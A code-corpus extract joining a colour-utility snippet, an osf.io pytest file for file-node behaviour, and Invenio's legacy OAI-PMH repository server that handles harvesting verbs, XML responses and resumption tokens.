CYAN_BOLD, CYAN_DIM = CYAN.mix(BOLD, DIM)
ORANGE_BOLD, ORANGE_DIM = ORANGE.mix(BOLD, DIM)
| rsalmei/clearly | clearly/utils/colors.py | Python | mit | 1,146 | 0 |
import pytest
from django.contrib.contenttypes.models import ContentType
from addons.osfstorage import settings as osfstorage_settings
from osf.models import BaseFileNode, Folder, File
from osf_tests.factories import (
UserFactory,
ProjectFactory
)
pytestmark = pytest.mark.django_db
@pytest.fixture()
def user():
return UserFactory()
@pytest.fixture()
def project(user):
return ProjectFactory(creator=user)
@pytest.fixture()
def create_test_file(fake):
# TODO: Copied from api_tests/utils.py. DRY this up.
def _create_test_file(target, user=None, filename=None, create_guid=True):
filename = filename or fake.file_name()
user = user or target.creator
osfstorage = target.get_addon('osfstorage')
root_node = osfstorage.get_root()
test_file = root_node.append_file(filename)
if create_guid:
test_file.get_guid(create=True)
test_file.create_version(user, {
'object': '06d80e',
'service': 'cloud',
osfstorage_settings.WATERBUTLER_RESOURCE: 'osf',
}, {
'size': 1337,
'contentType': 'img/png'
}).save()
return test_file
return _create_test_file
def test_active_manager_does_not_return_trashed_file_nodes(project, create_test_file):
create_test_file(target=project)
deleted_file = create_test_file(target=project)
deleted_file.delete(user=project.creator, save=True)
content_type_for_query = ContentType.objects.get_for_model(project)
# root folder + file + deleted_file = 3 BaseFileNodes
assert BaseFileNode.objects.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 3
# root folder + file = 2 BaseFileNodes
assert BaseFileNode.active.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 2
def test_folder_update_calls_folder_update_method(project, create_test_file):
file = create_test_file(target=project)
parent_folder = file.parent
# the folder update method should be the Folder.update method
assert parent_folder.__class__.update == Folder.update
# the folder update method should not be the File update method
assert parent_folder.__class__.update != File.update
# the file update method should be the File update method
assert file.__class__.update == File.update
| erinspace/osf.io | osf_tests/test_files.py | Python | apache-2.0 | 2,401 | 0.002499 |
# This file is part of Invenio.
# Copyright (C) 2009, 2010, 2011, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Receive OAI-PMH 2.0 requests and responds"""
__revision__ = "$Id$"
from six.moves import cPickle
import os
import re
import time
import tempfile
import sys
import datetime
if sys.hexversion < 0x2050000:
from glob import glob as iglob
else:
from glob import iglob
from flask import url_for, abort
from flask_login import current_user
from intbitset import intbitset
from six import iteritems
from invenio.config import \
CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG, \
CFG_CACHEDIR, \
CFG_CERN_SITE, \
CFG_OAI_DELETED_POLICY, \
CFG_OAI_EXPIRE, \
CFG_OAI_FRIENDS, \
CFG_OAI_IDENTIFY_DESCRIPTION, \
CFG_OAI_ID_FIELD, \
CFG_OAI_ID_PREFIX, \
CFG_OAI_LOAD, \
CFG_OAI_METADATA_FORMATS, \
CFG_OAI_PREVIOUS_SET_FIELD, \
CFG_OAI_PROVENANCE_ALTERED_SUBFIELD, \
CFG_OAI_PROVENANCE_BASEURL_SUBFIELD, \
CFG_OAI_PROVENANCE_DATESTAMP_SUBFIELD, \
CFG_OAI_PROVENANCE_HARVESTDATE_SUBFIELD, \
CFG_OAI_PROVENANCE_METADATANAMESPACE_SUBFIELD, \
CFG_OAI_PROVENANCE_ORIGINDESCRIPTION_SUBFIELD, \
CFG_OAI_SAMPLE_IDENTIFIER, \
CFG_OAI_SET_FIELD, \
CFG_SITE_NAME, \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_URL, \
CFG_WEBSTYLE_HTTP_USE_COMPRESSION
from invenio.base.globals import cfg
from invenio.ext.logging import register_exception
from invenio.legacy.bibrecord import record_get_field_instances
from invenio.legacy.dbquery import run_sql, wash_table_column_name, \
datetime_format
from invenio.legacy.oairepository.config import CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC
from invenio.legacy.search_engine import record_exists, \
search_unit_in_bibxxx, get_record
from invenio_formatter import format_record
from invenio.modules.search.api import Query
from invenio.utils.date import localtime_to_utc, utc_to_localtime
from invenio.utils.html import X, EscapedXMLString
CFG_VERBS = {
'GetRecord' : ['identifier', 'metadataPrefix'],
'Identify' : [],
'ListIdentifiers' : ['from', 'until',
'metadataPrefix',
'set',
'resumptionToken'],
'ListMetadataFormats': ['identifier'],
'ListRecords' : ['from', 'until',
'metadataPrefix',
'set',
'resumptionToken'],
'ListSets' : ['resumptionToken']
}
CFG_ERRORS = {
"badArgument": "The request includes illegal arguments, is missing required arguments, includes a repeated argument, or values for arguments have an illegal syntax:",
"badResumptionToken": "The value of the resumptionToken argument is invalid or expired:",
"badVerb": "Value of the verb argument is not a legal OAI-PMH verb, the verb argument is missing, or the verb argument is repeated:",
"cannotDisseminateFormat": "The metadata format identified by the value given for the metadataPrefix argument is not supported by the item or by the repository:",
"idDoesNotExist": "The value of the identifier argument is unknown or illegal in this repository:",
"noRecordsMatch": "The combination of the values of the from, until, set and metadataPrefix arguments results in an empty list:",
"noMetadataFormats": "There are no metadata formats available for the specified item:",
"noSetHierarchy": "The repository does not support sets:"
}
CFG_MIN_DATE = "1970-01-01T00:00:00Z"
CFG_MAX_DATE = "9999-12-31T23:59:59Z"
def get_all_field_values(tag):
"""
Return all existing values stored for a given tag.
@param tag: the full tag, e.g. 909C0b
@type tag: string
@return: the list of values
@rtype: list of strings
"""
table = 'bib%02dx' % int(tag[:2])
return [row[0] for row in run_sql("SELECT DISTINCT(value) FROM %s WHERE tag=%%s" % table, (tag, ))]
def oai_error(argd, errors):
"""
Return a well-formatted OAI-PMH error
"""
out = """<?xml version="1.0" encoding="UTF-8"?>
<OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/
http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">"""
out += X.responseDate()(get_utc_now())
for error_code, error_msg in errors:
assert(error_code in CFG_ERRORS)
if error_code in ("badArgument", "badVerb"):
out += X.request()(oai_get_request_url())
break
else:
## There are no badArgument or badVerb errors so we can
## return the whole request information
out += X.request(**argd)(oai_get_request_url())
for error_code, error_msg in errors:
if error_msg is None:
error_msg = CFG_ERRORS[error_code]
else:
error_msg = "%s %s" % (CFG_ERRORS[error_code], error_msg)
out += X.error(code=error_code)(error_msg)
out += "</OAI-PMH>"
return out
def oai_header(argd, verb):
"""
Return OAI header
"""
out = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\n"
out += "<?xml-stylesheet type=\"text/xsl\" href=\"%s\" ?>\n" % (
url_for('oairepository.static',
filename='xsl/oairepository/oai2.xsl.v1.0'))
out += "<OAI-PMH xmlns=\"http://www.openarchives.org/OAI/2.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd\">\n"
#out += "<responseDate>%s</responseDate>" % get_utc_now()
out += X.responseDate()(get_utc_now())
if verb:
out += X.request(**argd)(oai_get_request_url())
out += "<%s>\n" % verb
else:
out += X.request()(oai_get_request_url())
return out
def oai_footer(verb):
"""
@return: the OAI footer.
"""
out = ""
if verb:
out += "</%s>\n" % (verb)
out += "</OAI-PMH>\n"
return out
def get_field(recid, field):
"""
Gets list of field 'field' for the record with 'recid' system number.
"""
digit = field[0:2]
bibbx = "bib%sx" % digit
bibx = "bibrec_bib%sx" % digit
query = "SELECT bx.value FROM %s AS bx, %s AS bibx WHERE bibx.id_bibrec=%%s AND bx.id=bibx.id_bibxxx AND bx.tag=%%s" % (wash_table_column_name(bibbx), wash_table_column_name(bibx))
return [row[0] for row in run_sql(query, (recid, field))]
def get_modification_date(recid):
"""Returns the date of last modification for the record 'recid'.
Return empty string if no record or modification date in UTC.
"""
out = ""
res = run_sql("SELECT " + datetime_format('modification_date') + " FROM bibrec WHERE id=%s", (recid,), 1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def get_earliest_datestamp():
"""Get earliest datestamp in the database
Return empty string if no records or earliest datestamp in UTC.
"""
out = CFG_MIN_DATE
res = run_sql("SELECT " + datetime_format('MIN(creation_date)', False) + " FROM bibrec", n=1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def get_latest_datestamp():
"""Get latest datestamp in the database
Return empty string if no records or latest datestamp in UTC.
"""
out = CFG_MAX_DATE
res = run_sql("SELECT " + datetime_format('MAX(modification_date)', False) + " FROM bibrec", n=1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def check_date(date):
"""Check if given date has a correct format, complying to "Complete date" or
"Complete date plus hours, minutes and seconds" formats defined in ISO8601."""
if(re.match("\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\dZ)?\Z", date) is not None):
return date
else:
return ""
def normalize_date(date, dtime="T00:00:00Z"):
"""
Normalize the given date to the
"Complete date plus hours, minutes and seconds" format defined in ISO8601
(If "hours, minutes and seconds" part is missing, append 'dtime' to date).
'date' must be checked before with check_date(..).
Returns empty string if cannot be normalized
"""
if len(date) == 10:
date = date + dtime
elif len(date) != 20:
date = ""
return date
def get_record_provenance(recid):
"""
Return the provenance XML representation of a record, suitable to be put
in the about tag.
"""
record = get_record(recid)
provenances = record_get_field_instances(record, CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[:3], CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[3], CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[4])
out = ""
for provenance in provenances:
base_url = identifier = datestamp = metadata_namespace = origin_description = harvest_date = altered = ""
for (code, value) in provenance[0]:
if code == CFG_OAI_PROVENANCE_BASEURL_SUBFIELD:
base_url = value
elif code == CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[5]:
identifier = value
elif code == CFG_OAI_PROVENANCE_DATESTAMP_SUBFIELD:
datestamp = value
elif code == CFG_OAI_PROVENANCE_METADATANAMESPACE_SUBFIELD:
metadata_namespace = value
elif code == CFG_OAI_PROVENANCE_ORIGINDESCRIPTION_SUBFIELD:
origin_description = value
elif code == CFG_OAI_PROVENANCE_HARVESTDATE_SUBFIELD:
harvest_date = value
elif code == CFG_OAI_PROVENANCE_ALTERED_SUBFIELD:
altered = value
if base_url:
out += """<provenance xmlns="http://www.openarchives.org/OAI/2.0/provenance" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/provenance http://www.openarchives.org/OAI/2.0/provenance.xsd">"""
out += X.originDescription(harvestDate=harvest_date, altered=altered)(
X.baseURL()(base_url),
X.identifier()(identifier),
X.datestamp()(datestamp),
X.metadataNamespace()(metadata_namespace),
origin_description and X.originDescription(origin_description) or '' ## This is already XML
)
out += """</provenance>"""
return out
def get_record_rights(dummy):
"""
Return the record rights parts, suitable to be put in the about tag.
"""
return ""
## FIXME: This need to be thought in a good way. What shall we really
## put in the rights parts?
#record = get_record(recid)
#rights = record_get_field_instances(record, CFG_OAI_RIGHTS_FIELD[:3], CFG_OAI_RIGHTS_FIELD[3], CFG_OAI_RIGHTS_FIELD[4])
#license = record_get_field_instances(record, CFG_OAI_LICENSE_FIELD[:3], CFG_OAI_LICENSE_FIELD[3], CFG_OAI_LICENSE_FIELD[4])
#holder = date = rights_uri = contact = statement = terms = publisher = license_uri = ''
#if rights:
#for code, value in rights[0][0]:
#if code == CFG_OAI_RIGHTS_HOLDER_SUBFIELD:
#holder = value
#elif code == CFG_OAI_RIGHTS_DATE_SUBFIELD:
#date = value
#elif code == CFG_OAI_RIGHTS_URI_SUBFIELD:
#rights_uri = value
#elif code == CFG_OAI_RIGHTS_CONTACT_SUBFIELD:
#contact = value
#elif CFG_OAI_RIGHTS_STATEMENT_SUBFIELD:
#statement = value
#if license:
#for code, value in license[0][0]:
#if code == CFG_OAI_LICENSE_TERMS_SUBFIELD:
#terms = value
#elif code == CFG_OAI_LICENSE_PUBLISHER_SUBFIELD:
#publisher = value
#elif code == CFG_OAI_LICENSE_URI_SUBFIELD:
#license_uri = value
def print_record(recid, prefix='marcxml', verb='ListRecords', set_spec=None, set_last_updated=None):
"""Prints record 'recid' formatted according to 'prefix'.
- if record does not exist, return nothing.
- if record has been deleted and CFG_OAI_DELETED_POLICY is
'transient' or 'deleted', then return only header, with status
'deleted'.
- if record has been deleted and CFG_OAI_DELETED_POLICY is 'no',
then return nothing.
"""
record_exists_result = record_exists(recid) == 1
if record_exists_result:
sets = get_field(recid, CFG_OAI_SET_FIELD)
if set_spec is not None and not set_spec in sets and not [set_ for set_ in sets if set_.startswith("%s:" % set_spec)]:
## the record is not in the requested set, and is not
## in any subset
record_exists_result = False
if record_exists_result:
status = None
else:
status = 'deleted'
if not record_exists_result and CFG_OAI_DELETED_POLICY not in ('persistent', 'transient'):
return ""
idents = get_field(recid, CFG_OAI_ID_FIELD)
if not idents:
return ""
## FIXME: Move these checks in a bibtask
#try:
#assert idents, "No OAI ID for record %s, please do your checks!" % recid
#except AssertionError as err:
#register_exception(alert_admin=True)
#return ""
#try:
#assert len(idents) == 1, "More than OAI ID found for recid %s. Considering only the first one, but please do your checks: %s" % (recid, idents)
#except AssertionError as err:
#register_exception(alert_admin=True)
ident = idents[0]
header_body = EscapedXMLString('')
header_body += X.identifier()(ident)
if set_last_updated:
header_body += X.datestamp()(max(get_modification_date(recid), set_last_updated))
else:
header_body += X.datestamp()(get_modification_date(recid))
for set_spec in get_field(recid, CFG_OAI_SET_FIELD):
if set_spec and set_spec != CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC:
# Print only if field not empty
header_body += X.setSpec()(set_spec)
header = X.header(status=status)(header_body)
if verb == 'ListIdentifiers':
return header
else:
if record_exists_result:
metadata_body = format_record(recid, CFG_OAI_METADATA_FORMATS[prefix][0])
metadata = X.metadata(body=metadata_body)
provenance_body = get_record_provenance(recid)
if provenance_body:
provenance = X.about(body=provenance_body)
else:
provenance = ''
rights_body = get_record_rights(recid)
if rights_body:
rights = X.about(body=rights_body)
else:
rights = ''
else:
metadata = ''
provenance = ''
rights = ''
return X.record()(header, metadata, provenance, rights)
def oai_list_metadata_formats(argd):
"""Generates response to oai_list_metadata_formats verb."""
if argd.get('identifier'):
recid = oai_get_recid(argd['identifier'])
_record_exists = record_exists(recid)
if _record_exists != 1 and (_record_exists != -1 or CFG_OAI_DELETED_POLICY == "no"):
return oai_error(argd, [("idDoesNotExist", "invalid record Identifier: %s" % argd['identifier'])])
out = ""
for prefix, (dummy, schema, namespace) in CFG_OAI_METADATA_FORMATS.items():
out += X.metadataFormat()(
X.metadataPrefix(prefix),
X.schema(schema),
X.metadataNamespace(namespace)
)
return oai_header(argd, "ListMetadataFormats") + out + oai_footer("ListMetadataFormats")
def oai_list_records_or_identifiers(req, argd):
"""Generates response to oai_list_records verb."""
verb = argd['verb']
resumption_token_was_specified = False
# check if the resumption_token did not expire
if argd.get('resumptionToken'):
resumption_token_was_specified = True
try:
cache = oai_cache_load(argd['resumptionToken'])
last_recid = cache['last_recid']
argd = cache['argd']
complete_list = cache['complete_list']
complete_list = filter_out_based_on_date_range(complete_list, argd.get('from', ''), argd.get('until', ''))
except Exception, e:
# Ignore cache not found errors
if not isinstance(e, IOError) or e.errno != 2:
register_exception(alert_admin=True)
req.write(oai_error(argd, [("badResumptionToken", "ResumptionToken expired or invalid: %s" % argd['resumptionToken'])]))
return
else:
last_recid = 0
complete_list = oai_get_recid_list(argd.get('set', ""), argd.get('from', ""), argd.get('until', ""))
if not complete_list: # noRecordsMatch error
req.write(oai_error(argd, [("noRecordsMatch", "no records correspond to the request")]))
return
cursor = 0
for cursor, recid in enumerate(complete_list):
## Let's fast-forward the cursor to point after the last recid that was
## disseminated successfully
if recid > last_recid:
break
set_last_updated = get_set_last_update(argd.get('set', ""))
req.write(oai_header(argd, verb))
for recid in list(complete_list)[cursor:cursor+CFG_OAI_LOAD]:
req.write(print_record(recid, argd['metadataPrefix'], verb=verb, set_spec=argd.get('set'), set_last_updated=set_last_updated))
if list(complete_list)[cursor+CFG_OAI_LOAD:]:
resumption_token = oai_generate_resumption_token(argd.get('set', ''))
cache = {
'argd': argd,
'last_recid': recid,
# FIXME introduce IP check if you use fireroles for guests
'id_user': current_user.get_id(),
'complete_list': complete_list.fastdump(),
}
oai_cache_dump(resumption_token, cache)
expdate = oai_get_response_date(CFG_OAI_EXPIRE)
req.write(X.resumptionToken(expirationDate=expdate, cursor=cursor, completeListSize=len(complete_list))(resumption_token))
elif resumption_token_was_specified:
## Since a resumptionToken was used we shall put a last empty resumptionToken
req.write(X.resumptionToken(cursor=cursor, completeListSize=len(complete_list))(""))
req.write(oai_footer(verb))
oai_cache_gc()
def oai_list_sets(argd):
"""
Lists available sets for OAI metadata harvesting.
"""
out = ""
# note: no flow control in ListSets
sets = get_all_sets().values()
if not sets:
return oai_error(argd, [("noSetHierarchy", "No sets have been configured for this repository")])
for set_ in sets:
out += " <set>\n"
out += X.setSpec()(set_[0]) + X.setName()(set_[1])
if set_[2]:
out += X.setDescription()(set_[2])
out = out + " </set>\n"
return oai_header(argd, "ListSets") + out + oai_footer("ListSets")
def oai_get_record(argd):
"""Returns record 'identifier' according to 'metadataPrefix' format for OAI metadata harvesting.
- if record does not exist, return oai_error 'idDoesNotExist'.
- if record has been deleted and CFG_OAI_DELETED_POLICY is
'transient' or 'deleted', then return only header, with status
'deleted'.
- if record has been deleted and CFG_OAI_DELETED_POLICY is 'no',
then return oai_error 'idDoesNotExist'.
"""
recid = oai_get_recid(argd['identifier'])
_record_exists = record_exists(recid)
if _record_exists == 1 or \
(_record_exists == -1 and CFG_OAI_DELETED_POLICY != 'no'):
out = print_record(recid, argd['metadataPrefix'], _record_exists)
out = oai_header(argd, "GetRecord") + out + oai_footer("GetRecord")
else:
return oai_error(argd, [("idDoesNotExist", "invalid record Identifier: %s" % argd['identifier'])])
return out
def oai_identify(argd):
"""Generates a response to oai_identify verb.
script_url - *str* URL of the script used to access the
service. This is made necessary since the gateway
can be accessed either via /oai2d or /oai2d/ (or for
backward compatibility: oai2d.py or oai2d.py/), and
that the base URL must be returned in the Identify
response
"""
out = X.repositoryName()(CFG_SITE_NAME)
out += X.baseURL()(CFG_SITE_URL + '/oai2d')
out += X.protocolVersion()("2.0")
out += X.adminEmail()(CFG_SITE_SUPPORT_EMAIL)
out += X.earliestDatestamp()(get_earliest_datestamp())
out += X.deletedRecord()(CFG_OAI_DELETED_POLICY)
out += X.granularity()("YYYY-MM-DDThh:mm:ssZ")
if CFG_WEBSTYLE_HTTP_USE_COMPRESSION:
out += X.compression()('deflate')
out += X.description("""<oai-identifier xmlns="http://www.openarchives.org/OAI/2.0/oai-identifier"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai-identifier
http://www.openarchives.org/OAI/2.0/oai-identifier.xsd">""" +
X.scheme()("oai") +
X.repositoryIdentifier()(CFG_OAI_ID_PREFIX) +
X.delimiter()(":") +
X.sampleIdentifier()(CFG_OAI_SAMPLE_IDENTIFIER) +
"""</oai-identifier>""")
out += CFG_OAI_IDENTIFY_DESCRIPTION % {'CFG_SITE_URL': EscapedXMLString(CFG_SITE_URL)}
if CFG_OAI_FRIENDS:
friends = """<friends xmlns="http://www.openarchives.org/OAI/2.0/friends/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/friends/
http://www.openarchives.org/OAI/2.0/friends.xsd">"""
for baseurl in CFG_OAI_FRIENDS:
friends += X.baseURL()(baseurl)
friends += """</friends>"""
out += X.description(friends)
out = oai_header(argd, "Identify") + out + oai_footer("Identify")
return out
def get_utc_now():
"""
Return current UTC time in the OAI-PMH format.
"""
return datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
def oai_build_request_element(argd=None):
"""
Build the request tag.
"""
if argd is None:
argd = {}
return X.responseDate()(get_utc_now()) + X.request(**argd)("%s/oai2d" % CFG_SITE_URL)
def oai_get_request_url():
"""Generates requesturl tag for OAI."""
requesturl = CFG_SITE_URL + "/oai2d"
return requesturl
def oai_get_response_date(delay=0):
"""Generates responseDate tag for OAI."""
return time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(time.time() + delay))
def oai_get_recid(identifier):
"""Returns the recid corresponding to the OAI identifier. Prefer a non deleted
record if multiple recids matches but some of them are deleted (e.g. in
case of merging). Returns None if no record matches."""
if identifier:
recids = Query('{f}:"{p}"'.format(
f=CFG_OAI_ID_FIELD, p=identifier)
).search()
if recids:
for recid in recids:
if record_exists(recid) > 0:
return recid
return None
def get_set_last_update(set_spec=""):
"""
Returns the last_update of a given set (or of all sets) in UTC
"""
if set_spec:
last_update = run_sql("SELECT " + datetime_format('MAX(last_updated)') + """ FROM "oaiREPOSITORY" WHERE setSpec=%s""", (set_spec, ))[0][0]
else:
last_update = run_sql("SELECT " + datetime_format('MAX(last_updated)', False) + """ FROM "oaiREPOSITORY" """)[0][0]
if last_update:
return localtime_to_utc(last_update)
else:
return None
def filter_out_based_on_date_range(recids, fromdate="", untildate="", set_spec=None):
""" Filter out recids based on date range."""
if fromdate:
fromdate = normalize_date(fromdate, "T00:00:00Z")
else:
fromdate = get_earliest_datestamp()
fromdate = utc_to_localtime(fromdate)
if untildate:
untildate = normalize_date(untildate, "T23:59:59Z")
else:
untildate = get_latest_datestamp()
untildate = utc_to_localtime(untildate)
if set_spec is not None: ## either it has a value or it empty, thus meaning all records
last_updated = get_set_last_update(set_spec)
if last_updated is not None:
last_updated = utc_to_localtime(last_updated)
if last_updated > fromdate:
fromdate = utc_to_localtime(get_earliest_datestamp())
recids = intbitset(recids) ## Let's clone :-)
if fromdate and untildate:
recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date BETWEEN %s AND %s", (fromdate, untildate)))
elif fromdate:
recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date >= %s", (fromdate, )))
elif untildate:
recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date <= %s", (untildate, )))
return recids
def oai_get_recid_list(set_spec="", fromdate="", untildate=""):
"""
Returns list of recids for the OAI set 'set', modified from 'fromdate' until 'untildate'.
"""
ret = intbitset()
if not set_spec:
ret |= search_unit_in_bibxxx(p='*', f=CFG_OAI_SET_FIELD, m='e')
if CFG_OAI_DELETED_POLICY != 'no':
ret |= search_unit_in_bibxxx(p='*', f=CFG_OAI_PREVIOUS_SET_FIELD, m='e')
else:
ret |= search_unit_in_bibxxx(p=set_spec, f=CFG_OAI_SET_FIELD, m='e')
ret |= search_unit_in_bibxxx(p='%s:*' % set_spec, f=CFG_OAI_SET_FIELD, m='e')
if CFG_OAI_DELETED_POLICY != 'no':
ret |= search_unit_in_bibxxx(p=set_spec, f=CFG_OAI_PREVIOUS_SET_FIELD, m='e')
ret |= search_unit_in_bibxxx(p='%s:*' % set_spec, f=CFG_OAI_PREVIOUS_SET_FIELD, m='e')
if CFG_OAI_DELETED_POLICY == 'no':
ret -= search_unit_in_bibxxx(p='DELETED', f='980__%', m='e')
if CFG_CERN_SITE:
ret -= search_unit_in_bibxxx(p='DUMMY', f='980__%', m='e')
return filter_out_based_on_date_range(ret, fromdate, untildate, set_spec)
def oai_generate_resumption_token(set_spec):
"""Generates unique ID for resumption token management."""
fd, name = tempfile.mkstemp(dir=os.path.join(CFG_CACHEDIR, 'RTdata'), prefix='%s___' % set_spec)
os.close(fd)
return os.path.basename(name)
def oai_delete_resumption_tokens_for_set(set_spec):
"""
In case a set is modified by the admin interface, this will delete
any resumption token that is now invalid.
"""
aset = set_spec
while aset:
for name in iglob(os.path.join(CFG_CACHEDIR, 'RTdata', '%s___*' % set_spec)):
os.remove(name)
aset = aset.rsplit(":", 1)[0]
for name in iglob(os.path.join(CFG_CACHEDIR, 'RTdata', '___*')):
os.remove(name)
def oai_cache_dump(resumption_token, cache):
"""
Given a resumption_token and the cache, stores the cache.
"""
cPickle.dump(cache, open(os.path.join(CFG_CACHEDIR, 'RTdata', resumption_token), 'w'), -1)
def oai_cache_load(resumption_token):
"""Restore the cache from the resumption_token."""
fullpath = os.path.join(CFG_CACHEDIR, 'RTdata', resumption_token)
if os.path.dirname(os.path.abspath(fullpath)) != os.path.abspath(
os.path.join(CFG_CACHEDIR, 'RTdata')):
raise ValueError("Invalid path")
cache = cPickle.load(open(fullpath))
if cache.get('id_user', 0) == current_user.get_id():
return cache
abort(401)
def oai_cache_gc():
"""
OAI Cache Garbage Collector.
"""
cache_dir = os.path.join(CFG_CACHEDIR, 'RTdata')
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
for file_ in os.listdir(cache_dir):
filename = os.path.join(cache_dir, file_)
# cache entry expires when not modified during a specified period of time
if ((time.time() - os.path.getmtime(filename)) > CFG_OAI_EXPIRE):
try:
os.remove(filename)
except OSError as e:
# Most probably the cache was already deleted
pass
def get_all_sets():
"""
Return all the sets.
"""
res = run_sql("""SELECT "setSpec", "setName", "setDescription"
FROM "oaiREPOSITORY" """)
ret = {}
for row in res:
ret[row[0]] = row
## Let's expand with all the set that exist in the DB
for a_set in get_all_field_values(CFG_OAI_SET_FIELD):
if a_set not in ret:
ret[a_set] = (a_set, a_set, '')
## Let's expand with all the supersets
for a_set in ret.keys():
while ':' in a_set:
try:
a_set = a_set.rsplit(":", 1)[0]
except AttributeError:
a_set = ':'.join(a_set.split(":")[:-1])
if a_set not in ret:
ret[a_set] = (a_set, a_set, '')
if CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC in ret:
## Let's remove the special global set
del ret[CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC]
if '' in ret:
## '' is not a valid setSpec but might be in the MARC
del ret['']
return ret
def check_argd(argd):
"""
Check OAI arguments
Also transform them from lists to strings.
"""
errors = []
## no several times the same argument
bad_arguments_error = False
for param, value in iteritems(argd):
if len(value) > 1 and not bad_arguments_error:
errors.append(("badArgument", "More than one value specified for the %s argument: %s" % (param, value)))
bad_arguments_error = True ## This is needed only once
if len(value) > 0:
argd[param] = value[0]
else:
argd[param] = ''
## principal argument required
if argd['verb'] not in CFG_VERBS:
errors.append(("badVerb", "Illegal OAI verb: %s" % argd['verb']))
## defined argd
for param in argd.keys():
if not param in CFG_VERBS.get(argd['verb'], []) and param != 'verb' \
and not bad_arguments_error:
errors.append(("badArgument", "The request includes illegal arguments for the given verb: %s" % param))
bad_arguments_error = True
break # Indicate only once
## resumptionToken exclusive
if argd.get('resumptionToken', '') != "" and \
len(argd.keys()) != 2 and not bad_arguments_error:
errors.append(("badArgument", "The resumptionToken was specified together with other arguments"))
bad_arguments_error = True
if argd.get('resumptionToken', None) == '':
errors.append(("badResumptionToken", "ResumptionToken invalid: %s" % argd.get('resumptionToken', None)))
## datestamp formats
if 'from' in argd and \
'from' in CFG_VERBS.get(argd['verb'], []):
from_length = len(argd['from'])
if check_date(argd['from']) == "":
errors.append(("badArgument", "Bad datestamp format in from: %s" % argd['from']))
else:
from_length = 0
if 'until' in argd and \
'until' in CFG_VERBS.get(argd['verb'], []):
until_length = len(argd['until'])
if check_date(argd['until']) == "":
errors.append(("badArgument", "Bad datestamp format in until: %s" % argd['until']))
else:
until_length = 0
if from_length != 0:
if until_length != 0:
if from_length != until_length:
errors.append(("badArgument", "From and until have two different formats: %s Vs. %s" % (from_length, until_length)))
if 'from' in argd and 'until' in argd \
and argd['from'] > argd['until'] and \
'from' in CFG_VERBS.get(argd['verb'], []) and \
'until' in CFG_VERBS.get(argd['verb'], []):
errors.append(("badArgument", "from argument comes after until argument: %s > %s" % (argd['from'], argd['until'])))
## Identify exclusive
if argd['verb'] == "Identify" and \
len(argd.keys()) != 1:
if not bad_arguments_error: # Do not repeat this error
errors.append(("badArgument", "The request includes illegal arguments"))
bad_arguments_error = True
## parameters for GetRecord
if argd['verb'] == "GetRecord" and \
'identifier' not in argd:
errors.append(("badArgument", "Record identifier missing"))
if argd['verb'] == "GetRecord" and \
'metadataPrefix' not in argd:
errors.append(("badArgument", "Missing metadataPrefix"))
## parameters for ListRecords and ListIdentifiers
if (argd['verb'] == "ListRecords" or argd['verb'] == "ListIdentifiers") and \
('resumptionToken' not in argd and 'metadataPrefix' not in argd):
errors.append(("badArgument", "Missing metadataPrefix"))
## Metadata prefix defined and valid
if 'metadataPrefix' in argd and \
not argd['metadataPrefix'] in CFG_OAI_METADATA_FORMATS:
errors.append(("cannotDisseminateFormat", "Chosen format is not supported. Valid formats are: %s" % ', '.join(CFG_OAI_METADATA_FORMATS.keys())))
return errors
def oai_profile():
"""
Runs a benchmark
"""
from six import StringIO
oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "oai_dc", "verb": "ListRecords"})
oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "marcxml", "verb" :"ListRecords"})
oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "oai_dc", "verb": "ListIdentifiers"})
return
if __name__ == "__main__":
import profile
import pstats
profile.run('oai_profile()', "oai_profile")
p = pstats.Stats("oai_profile")
p.strip_dirs().sort_stats("cumulative").print_stats()
| ludmilamarian/invenio | invenio/legacy/oairepository/server.py | Python | gpl-2.0 | 34,384 | 0.006893 |
# clustering.py
